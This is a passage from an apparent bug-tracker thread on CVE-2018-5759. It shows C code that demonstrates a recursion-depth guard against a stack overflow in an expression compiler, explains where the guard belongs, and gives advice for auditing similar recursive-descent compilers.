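 * overflowed the stack above; do not run unguarded mode with large n. */
static int compile_chain(int n, int depth_limit, int *max_depth, long *ninstr)
{
    Node *root = build_chain(n);
    Compiler C = { depth_limit, 0, 0, 0 };
    cexp(&C, root, 0);
    free_chain(root);
    if (max_depth) *max_depth = C.max_depth;
    if (ninstr) *ninstr = C.ninstr;
    return C.too_deep ? -1 : 0;
}

/* Small accessors for inspecting a run. */
int chain_result(int n, int depth_limit) { return compile_chain(n, depth_limit, NULL, NULL); }
int chain_max_depth(int n, int depth_limit) { int d = 0; compile_chain(n, depth_limit, &d, NULL); return d; }
long chain_ninstr(int n, int depth_limit) { long i = 0; compile_chain(n, depth_limit, NULL, &i); return i; }

int main(void)
{
    /* Unguarded, small: recursion depth tracks operand count one-for-one. */
    printf("50 operands, unguarded: depth %d, %ld instructions\n",
           chain_max_depth(50, 0), chain_ninstr(50, 0));
    /* Guarded, PoC-sized: compilation stops at MAX_DEPTH + 1 and reports. */
    printf("80000 operands, guarded: result %d, depth %d\n",
           chain_result(80000, MAX_DEPTH), chain_max_depth(80000, MAX_DEPTH));
    return 0;
}
```

The guard sits in cbinary rather than in cexp because that is where the unbounded descent originates; in the guarded run the PoC-sized chain is rejected after MAX_DEPTH + 1 levels and the 80000-node tree is still freed, whereas the unguarded run would go 79999 levels deep. When auditing other recursive-descent compilers for the same class of bug, the check to look for is exactly this: a nesting counter incremented on every recursive step that turns deep input into an error, not just an optimistic assumption that source files are small.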
Comment 5 invictus1306 2018-01-25 02:49:59 UTC
This issue has been assigned CVE-2018-5759